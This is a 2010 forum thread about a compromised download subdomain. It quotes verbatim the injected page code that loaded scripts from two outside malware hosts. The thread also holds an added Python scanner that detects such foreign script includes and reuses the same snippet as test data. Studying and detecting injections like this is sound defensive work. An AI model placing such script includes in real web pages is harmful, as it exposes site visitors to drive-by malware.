Please fix files.co8.org

Discussion in 'Site and Forum Feedback' started by DarkStorm, Jun 15, 2010.

  1. DarkStorm

    DarkStorm Established Member

    Joined:
    Oct 2, 2003
    Messages:
    514
    Likes Received:
    3
    Hello,

    For *weeks*, Chrome has been showing me warnings whenever I open a thread with shiningted's avatar in it, because it is hosted on files.co8.org, which is infected by malware.

    files.co8.org includes code from flo4.biz, which is a malware hoster.

    Please clean this up!

    Regards,
    Storm
     
  2. maggit

    maggit Zombie RipTorn Wonka

    Joined:
    Oct 20, 2005
    Messages:
    1,945
    Likes Received:
    0
    Yeah, I get that warning on Firefox whenever I want to download anything (soundtrack samples, or any files) as well. Perhaps something for Taluntain to check out?
     
  3. Gaear

    Gaear Bastard Maestro Administrator

    Joined:
    Apr 27, 2004
    Messages:
    11,029
    Likes Received:
    42
    This is an old problem. Taluntain said that flo4.biz is not on our server, and that probably a neighboring IP on the network was infected and Google flagged ours as well.

    Agetian has requested a review from Google a couple times now, and Google has responded that they've checked the site and found it clean, and that they'll remove the warning, but then they never do.

    Not much else we can do. :shrug: It's sort of like dealing with the monolithic telephone or cable company.
     
  4. DarkStorm

    DarkStorm Established Member

    Joined:
    Oct 2, 2003
    Messages:
    514
    Likes Received:
    3
    No, check files.co8.org.
    This is the source code of the page that is served when I go to files.co8.org:
    Code:
    <meta http-equiv="refresh" content="0; url=http://www.co8.org/forum"><script src=http://flo4.biz/1.txt></script><script src=http://flo5.cn/1.txt></script></script>
    See that script include there? That's the malware inclusion part. Most likely scenario: co8.org was hacked and that snippet was put there to infect visitors of files.co8.org (most likely an automated hack/trojan, there are several out there that do something like this).

    The only way to clean this up is to remove the offending code snippet from files.co8.org, *then* contact Google (although Google will most likely unflag files.co8.org once it respiders it).

    Storm
     
  5. Taluntain

    Taluntain Established Member Administrator

    Joined:
    Oct 2, 2003
    Messages:
    345
    Likes Received:
    4
    That one file on the files subdomain (which is completely separate from the main Co8 site) actually was infected. Someone apparently uploaded the old, infected index at some point after the move of the files subdomain off the old server during the move of the files to the new server (probably via an old, infected backup - this file was clean when I checked it last). In any event, I've cleaned it up now, so it should all be fine. Sorry for the inconvenience and if you spot anything like that in the future, let us know directly!
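
Added example (not part of the original thread and not code from any poster): a check for the kind of injected script include quoted in post 4, usable on a web root or on an unpacked backup before it is restored, which is how the infected index came back according to post 5. The allowlist, function names and class name are assumptions made for this example.

```python
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Assumption: the only hosts this site should ever load scripts from.
ALLOWED_SCRIPT_HOSTS = {"co8.org", "www.co8.org", "files.co8.org"}

# The page source quoted in post 4 of this thread, verbatim.
INFECTED_INDEX = (
    '<meta http-equiv="refresh" content="0; url=http://www.co8.org/forum">'
    '<script src=http://flo4.biz/1.txt></script>'
    '<script src=http://flo5.cn/1.txt></script></script>'
)

class ScriptSrcCollector(HTMLParser):
    """Collects the src of every <script> tag, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.sources += [v.strip() for k, v in attrs if k == "src" and v]

def foreign_script_hosts(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return the sorted hosts of script includes that are not allowlisted."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    hosts = set()
    for src in collector.sources:
        # Relative paths have no hostname and are skipped; //host/x.js is caught.
        try:
            host = (urlparse(src).hostname or "").lower()
        except ValueError:  # malformed URL: report the raw value, do not skip it
            host = src
        if host and host not in allowed:
            hosts.add(host)
    return sorted(hosts)

def scan_tree(root):
    """Map each .htm/.html file under root to its non-allowlisted script hosts."""
    findings = {}
    for path in (p for p in Path(root).rglob("*.htm*") if p.is_file()):
        hosts = foreign_script_hosts(path.read_text(errors="replace"))
        if hosts:
            findings[str(path)] = hosts
    return findings
```

Running `scan_tree` over a backup before restoring it, and again over the live web root afterwards, flags a re-introduced include like the one above without waiting for a browser warning.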
     
  6. GuardianAngel82

    GuardianAngel82 Senior Member

    Joined:
    Oct 3, 2007
    Messages:
    3,481
    Likes Received:
    5
    Good police work! I'm glad something was finally found! :thumbsup:

    I've never been a believer in the "false alarm".
     
  7. Sitra Achara

    Sitra Achara Senior Member

    Joined:
    Sep 1, 2003
    Messages:
    3,611
    Likes Received:
    537
    Oh my!

    Under what circumstances does that actually infect your computer?
     
  8. Taluntain

    Taluntain Established Member Administrator

    Joined:
    Oct 2, 2003
    Messages:
    345
    Likes Received:
    4
    AFAIK that site was shut down a long time ago. Such exploit redirects usually have a very short TTL so they just remain as annoyances. It's not an infection in the virus sense of the word.
     
  9. Shiningted

    Shiningted I want my goat back Administrator

    Joined:
    Oct 23, 2004
    Messages:
    12,641
    Likes Received:
    349
    Thanks Tal.

    Good pickup DarkStorm, sorry I (also) suggested it was nothing to worry about :thumbsup:
     
  10. DarkStorm

    DarkStorm Established Member

    Joined:
    Oct 2, 2003
    Messages:
    514
    Likes Received:
    3
    As pointed out already, the site was most likely down anyway.

    Usually they exploit security vulnerabilities in your browser or any installed plugin to execute code on your computer. From there on, it works just like any other trojan/virus infection.

    What helps: Keep your browser and any plugins (especially Flash + Adobe Reader) up to date.
     
  11. sirchet

    sirchet Force for Goodness Moderator Supporter

    Joined:
    Dec 6, 2003
    Messages:
    3,721
    Likes Received:
    49
    Thanks guys, noted and appreciated.

    I'll be keeping my stuff updated.

    A question if I may?

    Completely, well at least kind of off topic, what is your opinion of Windows Defender?

    Can, should it be trusted? Is it enough by itself?

    Thanks in advance.
     
  12. DarkStorm

    DarkStorm Established Member

    Joined:
    Oct 2, 2003
    Messages:
    514
    Likes Received:
    3
    Definitely not.

    If you don't want to pay for Anti-Virus, and if you can live with a daily ad-popup on update, use Avira: http://www.avira.com/en/pages/index.php

    It's quite good, really.
     
  13. GuardianAngel82

    GuardianAngel82 Senior Member

    Joined:
    Oct 3, 2007
    Messages:
    3,481
    Likes Received:
    5
    I wouldn't mind hearing more opinions on this.
     
  14. ShadowDragoon

    ShadowDragoon Advocate of Vengence

    Joined:
    Dec 25, 2004
    Messages:
    579
    Likes Received:
    0
    I prefer Avast! Antivirus, myself. (I know, poking an old thread with a stick... sorry...)
     